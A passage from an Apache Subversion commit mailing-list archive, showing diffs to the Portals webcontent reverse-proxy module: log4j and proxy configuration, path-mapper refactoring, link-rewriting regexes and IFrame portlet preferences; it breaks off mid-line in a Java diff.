@@ -12,7 +12,6 @@ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. - # ------------------------------------------------------------------------ # # Logging Configuration @@ -21,16 +20,15 @@ # # ------------------------------------------------------------------------ -log4j.rootLogger = ERROR, errorlogging +log4j.rootLogger = INFO, console -log4j.appender.errorlogging = org.apache.log4j.FileAppender -log4j.appender.errorlogging.file = ${basedir}/target/surefire-reports/tests-error.log -log4j.appender.errorlogging.layout = org.apache.log4j.PatternLayout -log4j.appender.errorlogging.layout.conversionPattern = %d [%t] %-5p %c - %m%n -log4j.appender.errorlogging.append = false +log4j.category.org.apache.jetspeed = INFO, console +log4j.additivity.org.apache.jetspeed = false -log4j.appender.infologging = org.apache.log4j.FileAppender -log4j.appender.infologging.file = ${basedir}/target/surefire-reports/tests-info.log -log4j.appender.infologging.layout = org.apache.log4j.PatternLayout -log4j.appender.infologging.layout.conversionPattern = %d [%t] %-5p %c - %m%n -log4j.appender.infologging.append = false +# +# Console +# +log4j.appender.console = org.apache.log4j.ConsoleAppender +log4j.appender.console.layout = org.apache.log4j.PatternLayout +# Pattern to output the caller's file name and line number. +log4j.appender.console.layout.ConversionPattern = %d [%t] %-5p %c{1}:%L - %m%n Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/log4j.properties ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/log4j.properties ------------------------------------------------------------------------------ svn:keywords = Id Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Thu Oct 1 17:56:43 2009 @@ -75,18 +75,15 @@ # ... Sets detail attributes for each path item. -proxy.reverse.pass.apache.local = /apache/ -proxy.reverse.pass.apache.remote = http://www.apache.org/ - -proxy.reverse.pass.portals.local = /portals/ -proxy.reverse.pass.portals.remote = http://portals.apache.org/ -proxy.reverse.pass.portals.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter -proxy.reverse.pass.portals.rewriter.parserAdaptor = html +proxy.reverse.pass.apache.local = /*_apache/ +proxy.reverse.pass.apache.remote = http://$1.apache.org/ +proxy.reverse.pass.apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter +proxy.reverse.pass.apache.rewriter.parserAdaptor = html # ... SimpleLinkRewritingParserAaptor rewrites links only based on its remote base URLs, # ... while PassMappingLinkRewritingParserAaptor rewrites links based on all reverse proxy pass mappings. #proxy.reverse.pass.portals.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.SimpleLinkRewritingParserAaptor -proxy.reverse.pass.portals.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.PassMappingLinkRewritingParserAaptor -proxy.reverse.pass.portals.rewriter.parserAdaptor.html.mimeType = text/html +proxy.reverse.pass.apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.PassMappingLinkRewritingParserAaptor +proxy.reverse.pass.apache.rewriter.parserAdaptor.html.mimeType = text/html proxy.reverse.pass.localhost.local = /localhost/ proxy.reverse.pass.localhost.remote = http://localhost:8080/ Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml Thu Oct 1 17:56:43 2009 @@ -139,7 +139,7 @@ </preference> <preference> <name>PROXYLOCALPATH</name> - <value>${contextPath}/rproxy/portals/</value> + <value>${contextPath}/rproxy/portals_apache/</value> </preference> <preference> <name>AUTORESIZE</name> From [email protected] Fri Oct 02 13:09:36 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24878 invoked from network); 2 Oct 2009 13:09:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Oct 2009 13:09:36 -0000 Received: (qmail 91089 invoked by uid 500); 2 Oct 2009 13:09:36 -0000 Delivered-To: [email protected] Received: (qmail 91061 invoked by uid 500); 2 Oct 2009 13:09:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91051 invoked by uid 99); 2 Oct 2009 13:09:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Oct 2009 13:09:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Oct 2009 13:09:23 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 70931238888D; Fri, 2 Oct 2009 13:09:01 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r821006 - in /portals/applications/webcontent/trunk/webcontent-jar: ./ src/main/java/org/apache/portals/applications/webcontent/portlet/ src/main/java/org/apache/portals/applications/webcontent/proxy/ src/main/java/org/apache/portals/applic... Date: Fri, 02 Oct 2009 13:09:01 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Fri Oct 2 13:09:00 2009 New Revision: 821006 URL: http://svn.apache.org/viewvc?rev=821006&view=rev Log: APA-17: Enhances link rewriting. Glog expressioned sub domain urls can be rewritten now. Also, improves iframe generic portlet to have title preference and configurable on editable preferences as init param. Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java (with props) Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyConstants.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/pom.xml?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/pom.xml (original) +++ portals/applications/webcontent/trunk/webcontent-jar/pom.xml Fri Oct 2 13:09:00 2009 @@ -45,7 +45,6 @@ <commons-httpclient.version>3.0.1</commons-httpclient.version> <commons-beanutils.version>1.8.0</commons-beanutils.version> <commons-configuration.version>1.6</commons-configuration.version> - <easymock.version>2.5.2</easymock.version> </properties> <!-- Dependencies --> @@ -198,12 +197,6 @@ </exclusion> </exclusions> </dependency> - <dependency> - <groupId>org.easymock</groupId> - <artifactId>easymock</artifactId> - <version>${easymock.version}</version> - <scope>test</scope> - </dependency> </dependencies> <build> <plugins> Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java Fri Oct 2 13:09:00 2009 @@ -68,6 +68,8 @@ { super.init(config); + attributes.put("TITLE", ""); + attributes.put("EDITABLEPREFS", ""); attributes.put("SRC", "http://www.apache.org"); attributes.put("PROXYREMOTEURL", ""); attributes.put("PROXYLOCALPATH", ""); @@ -168,7 +170,8 @@ @Override public void doView(RenderRequest request, RenderResponse response) throws PortletException, IOException { - String viewPage = (String)request.getAttribute(PARAM_VIEW_PAGE); + String viewPage = (String) request.getAttribute(PARAM_VIEW_PAGE); + if (viewPage != null) { super.doView(request, response); @@ -180,6 +183,32 @@ } @Override + public void setupPreferencesEdit(RenderRequest request, RenderResponse response) + { + PortletPreferences prefs = request.getPreferences(); + String editablePrefNames = getAttributePreference(prefs, "EDITABLEPREFS"); + + if (StringUtils.isBlank(editablePrefNames)) + { + super.setupPreferencesEdit(request, response); + } + else + { + Map<String, String> prefsMap = new HashMap<String, String>(); + String [] prefNames = StringUtils.split(editablePrefNames, ","); + + for (String prefName : prefNames) + { + prefName = prefName.trim(); + prefsMap.put(prefName, prefs.getValue(prefName, "")); + } + + getContext(request, response).put("prefs", prefsMap.entrySet().iterator()); + getContext(request, response).put("prefsMap", prefsMap); + } + } + + @Override public void doEdit(RenderRequest request, RenderResponse response) throws PortletException, IOException { response.setContentType("text/html"); @@ -300,6 +329,13 @@ } } + String title = getAttributePreference(prefs, "TITLE"); + + if (!StringUtils.isEmpty(title)) + { + response.setTitle(title); + } + // set required content type and write HTML IFRAME content response.setContentType("text/html"); response.getWriter().print(content.toString()); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyConstants.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyConstants.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyConstants.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyConstants.java Fri Oct 2 13:09:00 2009 @@ -21,10 +21,6 @@ String HTTP_HEADER_LOCATION = "Location"; - String HTTP_HEADER_RANGE = "Range"; - - String HTTP_HEADER_IF_RANGE = "If-Range"; - String PATH_MAPPER = "org.apache.portals.applications.webcontent.proxy.reverseProxyPathMapper"; String SSO_SITE_CREDENTIALS_PROVIDER = "org.apache.portals.applications.webcontent.proxy.reverseProxySSOSiteCredentialsProvider"; Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java Fri Oct 2 13:09:00 2009 @@ -22,7 +22,7 @@ * * @version $Id$ */ -public interface HttpReverseProxyPathMapper extends Cloneable +public interface HttpReverseProxyPathMapper { /** @@ -32,36 +32,18 @@ public String getName(); /** - * Sets the name - * @return - */ - public void setName(String name); - - /** * Returns the local base path to be mapped to remote base url. * @return */ public String getLocalBasePath(); /** - * Sets the local base path to be mapped to remote base url. - * @return - */ - public void setLocalBasePath(String localBasePath); - - /** * Returns the remote base url mapped by the local path. * @return */ public String getRemoteBaseURL(); /** - * Sets the remote base url mapped by the local path. - * @return - */ - public void setRemoteBaseURL(String removeBaseURL); - - /** * Generates a remote url mapped by the path. * <P>It returns a translated remote URL or null if the translation fails.</P> * @param localPath @@ -77,10 +59,4 @@ */ public String getLocalPath(String remoteURL); - /** - * Clone object - * @return - */ - public Object clone(); - } \ No newline at end of file Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java Fri Oct 2 13:09:00 2009 @@ -18,8 +18,6 @@ import java.util.List; -import javax.servlet.http.HttpServletRequest; - import org.apache.portals.applications.webcontent.rewriter.RewriterController; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; @@ -32,10 +30,10 @@ { /** - * Finds a reverse proxy path mapper based on the request + * Finds a reverse proxy path mapper based on the path info. * @return */ - public HttpReverseProxyPathMapper findMapper(HttpServletRequest request); + public HttpReverseProxyPathMapper findMapper(String pathInfo); /** * Finds a reverse proxy path mapper based on the remoteURL Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java Fri Oct 2 13:09:00 2009 @@ -32,15 +32,12 @@ private int hash; - public DefaultHttpReverseProxyPathMapperImpl() - { - } - public DefaultHttpReverseProxyPathMapperImpl(String name, String localBasePath, String remoteBaseURL) { this.name = name; this.localBasePath = localBasePath; this.remoteBaseURL = remoteBaseURL; + hash = new StringBuilder(40).append(name).append(':').append(localBasePath).append(':').append(remoteBaseURL).toString().hashCode(); } public String getName() @@ -48,34 +45,16 @@ return name; } - public void setName(String name) - { - this.name = name; - this.hash = 0; - } - public String getLocalBasePath() { return localBasePath; } - public void setLocalBasePath(String localBasePath) - { - this.localBasePath = localBasePath; - this.hash = 0; - } - public String getRemoteBaseURL() { return remoteBaseURL; } - public void setRemoteBaseURL(String remoteBaseURL) - { - this.remoteBaseURL = remoteBaseURL; - this.hash = 0; - } - public String getRemoteURL(String localPath) { if (StringUtils.startsWith(localPath, localBasePath)) @@ -97,30 +76,15 @@ } @Override - public Object clone() - { - DefaultHttpReverseProxyPathMapperImpl cloned = new DefaultHttpReverseProxyPathMapperImpl(); - cloned.name = name; - cloned.localBasePath = localBasePath; - cloned.remoteBaseURL = remoteBaseURL; - return cloned; - } - - @Override public int hashCode() { - if (hash == 0) - { - hash = new StringBuilder(40).append(name).append(':').append(localBasePath).append(':').append(remoteBaseURL).toString().hashCode(); - } - return hash; } @Override public boolean equals(Object o) { - if (hash != o.hashCode()) + if (hashCode() != o.hashCode()) { return false; } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java Fri Oct 2 13:09:00 2009 @@ -24,8 +24,6 @@ import java.util.regex.Matcher; import java.util.regex.Pattern; -import javax.servlet.http.HttpServletRequest; - import org.apache.commons.lang.StringUtils; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; @@ -102,11 +100,8 @@ this.remoteBaseURLGlobPatternMap = Collections.synchronizedMap(new HashMap<HttpReverseProxyPathMapper, Pattern>()); } - public HttpReverseProxyPathMapper findMapper(HttpServletRequest request) + public HttpReverseProxyPathMapper findMapper(String pathInfo) { - HttpReverseProxyPathMapper mapper = null; - String pathInfo = request.getPathInfo(); - int mapperCount = proxyPathMappers.size(); for (int i = 0; i < mapperCount; i++) @@ -165,34 +160,35 @@ searches[i] = "$" + (i + 1); } - HttpReverseProxyPathMapper cloned = (HttpReverseProxyPathMapper) proxyPathMapper.clone(); + //HttpReverseProxyPathMapper cloned = (HttpReverseProxyPathMapper) proxyPathMapper.clone(); String localBasePath = matcher.group(0); - cloned.setName(proxyPathMapper.getName() + ":" + localBasePath); - cloned.setLocalBasePath(localBasePath); - cloned.setRemoteBaseURL(StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), searches, replaces)); + HttpReverseProxyPathMapper derivedMapper = + new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, + localBasePath, + StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), searches, replaces)); RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); if (rewriterController != null) { - rewriterControllerMap.put(cloned, rewriterController); + rewriterControllerMap.put(derivedMapper, rewriterController); } if (rewriterRules != null) { - rewriterRulesetMap.put(cloned, rewriterRules); + rewriterRulesetMap.put(derivedMapper, rewriterRules); } synchronized (proxyPathMappers) { - if (!proxyPathMappers.contains(cloned)) + if (!proxyPathMappers.contains(derivedMapper)) { - proxyPathMappers.add(cloned); + proxyPathMappers.add(derivedMapper); } } - return cloned; + return derivedMapper; } } } @@ -268,9 +264,7 @@ searches[i] = "$" + (i + 1); } - HttpReverseProxyPathMapper cloned = (HttpReverseProxyPathMapper) proxyPathMapper.clone(); String remoteBaseURL = matcher.group(0); - cloned.setRemoteBaseURL(remoteBaseURL); String localBasePath = proxyPathMapper.getLocalBasePath(); for (int i = 1; StringUtils.contains(localBasePath, '*'); i++) @@ -279,31 +273,33 @@ } localBasePath = StringUtils.replaceEach(localBasePath, searches, replaces); - cloned.setName(proxyPathMapper.getName() + ":" + localBasePath); - cloned.setLocalBasePath(localBasePath); + HttpReverseProxyPathMapper derivedMapper = + new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, + localBasePath, + remoteBaseURL); RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); if (rewriterController != null) { - rewriterControllerMap.put(cloned, rewriterController); + rewriterControllerMap.put(derivedMapper, rewriterController); } if (rewriterRules != null) { - rewriterRulesetMap.put(cloned, rewriterRules); + rewriterRulesetMap.put(derivedMapper, rewriterRules); } synchronized (proxyPathMappers) { - if (!proxyPathMappers.contains(cloned)) + if (!proxyPathMappers.contains(derivedMapper)) { - proxyPathMappers.add(cloned); + proxyPathMappers.add(derivedMapper); } } - return cloned; + return derivedMapper; } } } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Fri Oct 2 13:09:00 2009 @@ -22,10 +22,13 @@ import java.io.InputStream; import java.net.InetAddress; import java.util.ArrayList; +import java.util.Arrays; import java.util.HashMap; +import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; +import java.util.Set; import javax.servlet.ServletConfig; import javax.servlet.ServletException; @@ -42,6 +45,13 @@ import org.apache.commons.lang.StringUtils; import org.apache.commons.lang.math.NumberUtils; import org.apache.http.HttpHost; +import org.apache.http.client.methods.HttpDelete; +import org.apache.http.client.methods.HttpGet; +import org.apache.http.client.methods.HttpHead; +import org.apache.http.client.methods.HttpOptions; +import org.apache.http.client.methods.HttpPost; +import org.apache.http.client.methods.HttpPut; +import org.apache.http.client.methods.HttpTrace; import org.apache.http.client.params.ClientParamBean; import org.apache.http.conn.params.ConnManagerParamBean; import org.apache.http.conn.params.ConnPerRouteBean; @@ -67,6 +77,15 @@ { private static final long serialVersionUID = 1L; + private static final Set<String> AVAILABLE_HTTP_METHOD_SET = + new HashSet<String>(Arrays.asList(HttpGet.METHOD_NAME, + HttpHead.METHOD_NAME, + HttpPost.METHOD_NAME, + HttpPut.METHOD_NAME, + HttpDelete.METHOD_NAME, + HttpOptions.METHOD_NAME, + HttpTrace.METHOD_NAME)); + private static Logger log = LoggerFactory.getLogger(DefaultHttpReverseProxyServlet.class); protected HttpReverseProxyService proxyService; @@ -271,6 +290,7 @@ } } + @Override public void destroy() { if (proxyService != null) @@ -281,30 +301,33 @@ proxyService = null; } - public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException + @Override + protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - try + if (!AVAILABLE_HTTP_METHOD_SET.contains(request.getMethod())) { - proxyService.invoke(request, response); + super.service(request, response); } - finally + else { try { - // dummy read for refreshing... - configuration.getString("proxy.reverse.pass"); + proxyService.invoke(request, response); } - catch (Exception e) + finally { + try + { + // dummy read for refreshing... + configuration.getString("proxy.reverse.pass"); + } + catch (Exception e) + { + } } } } - public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException - { - doGet(request, response); - } - private RewriterController createRewriterController(final Configuration rewriterConf) { String ruleMappingsFilePath = null; Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java Fri Oct 2 13:09:00 2009 @@ -20,7 +20,10 @@ import java.io.PrintWriter; import java.io.Reader; import java.io.Writer; +import java.util.ArrayList; +import java.util.HashSet; import java.util.List; +import java.util.Set; import java.util.regex.Matcher; import java.util.regex.Pattern; @@ -36,6 +39,7 @@ import org.apache.portals.applications.webcontent.rewriter.ParserAdaptor; import org.apache.portals.applications.webcontent.rewriter.Rewriter; import org.apache.portals.applications.webcontent.rewriter.RewriterException; +import org.apache.portals.applications.webcontent.util.CharArraySegment; import org.slf4j.Logger; import org.slf4j.LoggerFactory; @@ -50,29 +54,51 @@ public class PassMappingLinkRewritingParserAaptor implements ParserAdaptor, ReverseProxyRewritingContextAware { + protected static final Pattern LINK_ABS_PATH_PATTERN = + Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*(['\"])((\\/)[^'\"]*)['\"]", Pattern.CASE_INSENSITIVE); + + protected static final Pattern LINK_HTTP_ABS_URL_PATTERN = + Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*['\"](https?:\\/\\/[^\\/'\"]+)[^'\"]*['\"]", Pattern.CASE_INSENSITIVE); + + protected static final Pattern HTTP_DOMAIN_ADDRESS_ONLY_PATTERN = + Pattern.compile("^https?:\\/\\/[^\\/]+$", Pattern.CASE_INSENSITIVE); + private static Logger log = LoggerFactory.getLogger(PassMappingLinkRewritingParserAaptor.class); - protected boolean lookUpAllMappings = true; + protected boolean lookUpAllMappings; protected ReverseProxyRewritingContext reverseProxyRewritingContext; - protected Pattern linkBasePathPattern = Pattern.compile("\\s(href|src|action)\\s*=\\s*(['\"])((\\/)[^'\"]+)['\"]", Pattern.CASE_INSENSITIVE); - protected String [] linkRemoteBaseURLSearches = { "/", "." }; protected String [] linkRemoteBaseURLReplaces = { "\\/", "\\." }; - private KeyValue [] remoteURLPatternReplacesPairs; + private List<HttpReverseProxyPathMapper> proxyPathMappers; + private List<KeyValue> remoteURLPatternReplacesPairs; private KeyValue myURLPatternReplacesPair; + private Set<String> blacklist; + public PassMappingLinkRewritingParserAaptor() { + this(true, null); + } + + public PassMappingLinkRewritingParserAaptor(boolean lookUpAllMappings, Set<String> blacklist) + { + setLookUpAllMappings(lookUpAllMappings); + setBlacklist(blacklist); } - public PassMappingLinkRewritingParserAaptor(boolean lookUpAllMappings) + public void setLookUpAllMappings(boolean lookUpAllMappings) { this.lookUpAllMappings = lookUpAllMappings; } + public void setBlacklist(Set<String> blacklist) + { + this.blacklist = blacklist; + } + public void setReverseProxyRewritingContext(ReverseProxyRewritingContext reverseProxyRewritingContext) { this.reverseProxyRewritingContext = reverseProxyRewritingContext; @@ -80,8 +106,14 @@ public void rewrite(Rewriter rewriter, Reader reader, Writer writer) throws RewriterException { + HttpReverseProxyPathMapperProvider proxyPathMapperProvider = reverseProxyRewritingContext.getHttpReverseProxyPathMapperProvider(); String myLocalPathMatchingReplaces = createLocalPathMatchingReplaces(reverseProxyRewritingContext.getHttpReverseProxyPathMapper()); + if (lookUpAllMappings && blacklist == null) + { + blacklist = new HashSet<String>(); + } + PrintWriter out = new PrintWriter(new BufferedWriter(writer)); for (LineIterator lineIt = IOUtils.lineIterator(reader); lineIt.hasNext(); ) @@ -94,23 +126,61 @@ try { // first, replace slash leading relative paths by slash leading reverse proxying relative paths. - Matcher linkBasePathMatcher = linkBasePathPattern.matcher(tempLine); - tempLine = linkBasePathMatcher.replaceAll(" $1=$2" + myLocalPathMatchingReplaces + "$3$2"); + Matcher linkBasePathMatcher = LINK_ABS_PATH_PATTERN.matcher(tempLine); + tempLine = linkBasePathMatcher.replaceAll("$1$2=$3" + myLocalPathMatchingReplaces + "$4$3"); // second, replace absolute urls by slash leading relative paths. if (lookUpAllMappings) { for (KeyValue pair : getRemoteURLPatternReplacesPairs()) { - Matcher otherLinkBasePathMatcher = ((Pattern) pair.getKey()).matcher(tempLine); - tempLine = otherLinkBasePathMatcher.replaceAll(" $1=$2" + ((String) pair.getValue()) + "$5$2"); + Matcher matcher = ((Pattern) pair.getKey()).matcher(tempLine); + tempLine = replaceRemoteLinkValues(matcher, "$1$2=$3" + ((String) pair.getValue()) + "$6$3", tempLine); + } + + // if there's any https? absolute url link, try to find the proxy path mapper again... + + CharSequence segment = new CharArraySegment(tempLine); + + for (Matcher absURLMatcher = LINK_HTTP_ABS_URL_PATTERN.matcher(segment); absURLMatcher.find(); ) + { + String domainURL = absURLMatcher.group(3); + + if (blacklist.contains(domainURL)) + { + continue; + } + + HttpReverseProxyPathMapper proxyMapper = proxyPathMapperProvider.findMapperByRemoteURL(domainURL + "/"); + + if (proxyMapper == null) + { + blacklist.add(domainURL); + } + else + { + if (!proxyPathMappers.contains(proxyMapper)) + { + KeyValue pair = new 